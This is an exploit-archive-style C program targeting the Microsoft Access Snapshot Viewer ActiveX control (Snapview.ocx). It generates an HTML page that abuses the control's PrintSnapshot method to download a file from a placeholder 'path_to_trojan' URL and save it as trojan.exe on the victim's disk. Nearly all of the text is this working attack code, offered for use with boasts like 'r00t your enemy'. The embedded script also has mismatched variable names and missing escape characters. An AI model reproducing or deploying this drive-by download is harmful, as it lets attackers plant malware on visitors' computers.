Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

/* Microsoft Access Snapshot Viewer ActiveX Control Exploit

Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0

Download nice binaries into an arbitrary box

Vulnerability discovered by Oliver Lavery

http://www.securityfocus.com/bid/8536/info

Remote: Yes

greetz to str0ke */ #include <stdio.h>

#include <stdlib.h>

#define Filename "Ms-Access-SnapShot.html"

FILE *File;

char data[] = "<html>n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attaque'></object>n"

"<script language='javascript'>nvar arbitrary_file = 'http://path_to_trojan'n"

"var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'nattack.SnapshotPath = arbitrary_filen"

"attack.CompressedPath = destinationnattack.PrintSnapshot(arbitrary_file,destination)n"

"<script>n<html>"; int main ()

{

printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**n");

printf("**c0ded by callAX**n");

printf("**r00t your enemy .| **"); FILE *File;

char *b0fer; if ( (File = fopen(Filename,"w b")) == NULL ) {

printf("n fopen() error");

exit(1);

} b0fer = (char*)malloc(strlen(data));

memcpy(b0fer,data,sizeof(data)-1);

fwrite(b0fer, strlen(data), 1,File);

fclose(File); printf("nn" Filename " has been created.n");

return 0;

}